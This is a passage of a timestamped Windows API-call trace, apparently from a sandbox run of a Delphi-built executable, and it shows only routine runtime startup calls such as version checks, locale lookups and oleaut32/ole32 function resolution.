0x1f [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0086.512] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0086.513] GetVersionExW (in: lpVersionInformation=0x19faf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19faf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0086.513] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75130000 [0086.513] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2252c8 [0086.513] GetProcAddress (hModule=0x75130000, lpProcName="GetNativeSystemInfo") returned 0x7514a410 [0086.513] GetNativeSystemInfo (in: lpSystemInfo=0x19facc | out: lpSystemInfo=0x19facc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0086.514] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x8 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x2, dwlConditionMask=0x8 | out: lpVersionInformation=0x19f970) returned 1 [0086.514] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x1) returned 0x1 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 0 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 0 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 1 [0086.514] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x20) returned 0x8000 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x20, dwlConditionMask=0x8000 | out: lpVersionInformation=0x19f970) returned 1 [0086.514] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x10) returned 0x1000 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x10, dwlConditionMask=0x1000 | out: lpVersionInformation=0x19f970) returned 1 [0086.514] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x4) returned 0x40 [0086.514] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x4, dwlConditionMask=0x40 | out: lpVersionInformation=0x19f970) returned 1 [0086.514] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x19dab0, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0086.514] LoadStringW (in: hInstance=0x400000, uID=0xff53, lpBuffer=0x19dab0, cchBufferMax=4096 | out: lpBuffer="Windows 8") returned 0x9 [0086.514] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0086.514] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0086.515] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0086.515] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0086.515] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0086.515] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0086.515] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0086.515] GetVersionExW (in: lpVersionInformation=0x19fae4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x02") | out: lpVersionInformation=0x19fae4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0086.515] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0086.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x1e980dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0086.515] GetProcAddress (hModule=0x75130000, lpProcName="GetDiskFreeSpaceExW") returned 0x751562d0 [0086.515] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9ba, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x2a [0086.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0086.516] GetThreadLocale () returned 0x409 [0086.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x19fb00 | out: lpCPInfo=0x19fb00) returned 1 [0086.516] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0086.517] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.517] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0086.517] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0086.517] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x19fa60 | out: Buffer=0x0, ReturnedLength=0x19fa60) returned 0 [0086.517] GetLastError () returned 0x7a [0086.517] GetLogicalProcessorInformation (in: Buffer=0x1e899d0, ReturnedLength=0x19fa60 | out: Buffer=0x1e899d0, ReturnedLength=0x19fa60) returned 1 [0086.517] GetCurrentThreadId () returned 0x3ac [0086.517] GetCurrentThreadId () returned 0x3ac [0086.517] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x19f868, cchData=256 | out: lpLCData="2") returned 2 [0086.518] GetThreadLocale () returned 0x409 [0086.518] EnumCalendarInfoW (lpCalInfoEnumProc=0x4205a0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0086.518] GetThreadLocale () returned 0x409 [0086.518] EnumCalendarInfoW (lpCalInfoEnumProc=0x420644, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0086.518] GetCurrentThreadId () returned 0x3ac [0086.518] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sun") returned 4 [0086.518] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sunday") returned 7 [0086.518] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x19f864, cchData=256 | out: lpLCData="Mon") returned 4 [0086.518] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f864, cchData=256 | out: lpLCData="Monday") returned 7 [0086.518] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x19f864, cchData=256 | out: lpLCData="Tue") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f864, cchData=256 | out: lpLCData="Tuesday") returned 8 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x19f864, cchData=256 | out: lpLCData="Wed") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f864, cchData=256 | out: lpLCData="Wednesday") returned 10 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x19f864, cchData=256 | out: lpLCData="Thu") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f864, cchData=256 | out: lpLCData="Thursday") returned 9 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x19f864, cchData=256 | out: lpLCData="Fri") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f864, cchData=256 | out: lpLCData="Friday") returned 7 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sat") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f864, cchData=256 | out: lpLCData="Saturday") returned 9 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jan") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x19f868, cchData=256 | out: lpLCData="January") returned 8 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x19f868, cchData=256 | out: lpLCData="Feb") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x19f868, cchData=256 | out: lpLCData="February") returned 9 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x19f868, cchData=256 | out: lpLCData="Mar") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f868, cchData=256 | out: lpLCData="March") returned 6 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x19f868, cchData=256 | out: lpLCData="Apr") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f868, cchData=256 | out: lpLCData="April") returned 6 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x19f868, cchData=256 | out: lpLCData="May") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f868, cchData=256 | out: lpLCData="May") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jun") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f868, cchData=256 | out: lpLCData="June") returned 5 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jul") returned 4 [0086.519] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f868, cchData=256 | out: lpLCData="July") returned 5 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f868, cchData=256 | out: lpLCData="Aug") returned 4 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f868, cchData=256 | out: lpLCData="August") returned 7 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f868, cchData=256 | out: lpLCData="Sep") returned 4 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x19f868, cchData=256 | out: lpLCData="September") returned 10 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f868, cchData=256 | out: lpLCData="Oct") returned 4 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x19f868, cchData=256 | out: lpLCData="October") returned 8 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f868, cchData=256 | out: lpLCData="Nov") returned 4 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x19f868, cchData=256 | out: lpLCData="November") returned 9 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f868, cchData=256 | out: lpLCData="Dec") returned 4 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x19f868, cchData=256 | out: lpLCData="December") returned 9 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="$") returned 2 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x19fab0, cchData=2 | out: lpLCData=",") returned 2 [0086.520] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x19fab0, cchData=2 | out: lpLCData=".") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="2") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fab0, cchData=2 | out: lpLCData="/") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f870, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f870, cchData=256 | out: lpLCData="1") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x19f870, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f870, cchData=256 | out: lpLCData="1") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fab0, cchData=2 | out: lpLCData=":") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="AM") returned 3 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="PM") returned 3 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0086.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x19fab0, cchData=2 | out: lpLCData=",") returned 2 [0086.521] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76ce0000 [0086.521] GetProcAddress (hModule=0x76ce0000, lpProcName="VariantChangeTypeEx") returned 0x76cf7e70 [0086.521] GetProcAddress (hModule=0x76ce0000, lpProcName="VarNeg") returned 0x76d40400 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarNot") returned 0x76d41670 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarAdd") returned 0x76d18460 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarSub") returned 0x76d19960 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarMul") returned 0x76d19090 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarDiv") returned 0x76d40910 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarIdiv") returned 0x76d412b0 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarMod") returned 0x76d41510 [0086.522] GetProcAddress (hModule=0x76ce0000, lpProcName="VarAnd") returned 0x76d0f9d0 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarOr") returned 0x76d41720 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarXor") returned 0x76d418c0 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarCmp") returned 0x76d04040 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarI4FromStr") returned 0x76d04b50 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarR4FromStr") returned 0x76d0f4c0 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarR8FromStr") returned 0x76d11740 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarDateFromStr") returned 0x76d05a80 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarCyFromStr") returned 0x76d42e50 [0086.523] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBoolFromStr") returned 0x76d020d0 [0086.524] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromCy") returned 0x76d05240 [0086.524] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromDate") returned 0x76d05420 [0086.524] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromBool") returned 0x76d02080 [0086.524] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0086.525] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1e0 [0086.525] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e4 [0086.527] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbd8 | out: lpPerformanceCount=0x19fbd8*=13399004746) returned 1 [0086.527] GetTickCount () returned 0x20b41 [0086.528] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x3, wMilliseconds=0x9b)) [0086.528] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x3, wMilliseconds=0x9b)) [0086.528] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbd8 | out: lpPerformanceCount=0x19fbd8*=13399063461) returned 1 [0086.528] GetTickCount () returned 0x20b41 [0086.528] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x3, wMilliseconds=0x9b)) [0086.528] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x3, wMilliseconds=0x9b)) [0086.529] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76f30000 [0086.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0086.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x1e982bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0086.529] GetProcAddress (hModule=0x76f30000, lpProcName="CoCreateInstanceEx") returned 0x7503baf0 [0086.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0086.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x1e8288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0086.529] GetProcAddress (hModule=0x76f30000, lpProcName="CoInitializeEx") returned 0x74fdcd50 [0086.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x1e982bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0086.530] GetProcAddress (hModule=0x76f30000, lpProcName="CoAddRefServerProcess") returned 0x7503d120 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x1e982bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0086.530] GetProcAddress (hModule=0x76f30000, lpProcName="CoReleaseServerProcess") returned 0x75041970 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x1e982bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0086.530] GetProcAddress (hModule=0x76f30000, lpProcName="CoResumeClassObjects") returned 0x75046640 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x1e982bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0086.530] GetProcAddress (hModule=0x76f30000, lpProcName="CoSuspendClassObjects") returned 0x74fb1f60 [0086.531] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x1e9f45c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0086.531] GetProcAddress (hModule=0x75130000, lpProcName="InitializeConditionVariable") returned 0x779e9da0 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x1e982bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0086.531] GetProcAddress (hModule=0x75130000, lpProcName="WakeConditionVariable") returned 0x779f5860 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x1e9f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0086.531] GetProcAddress (hModule=0x75130000, lpProcName="WakeAllConditionVariable") returned 0x779f3370 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0086.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x1e9f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0086.531] GetProcAddress (hModule=0x75130000, lpProcName="SleepConditionVariableCS") returned 0x74e62850 [0086.532] GetThreadLocale () returned 0x409 [0086.532] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0086.532] GetCurrentThreadId () returned 0x3ac [0086.532] 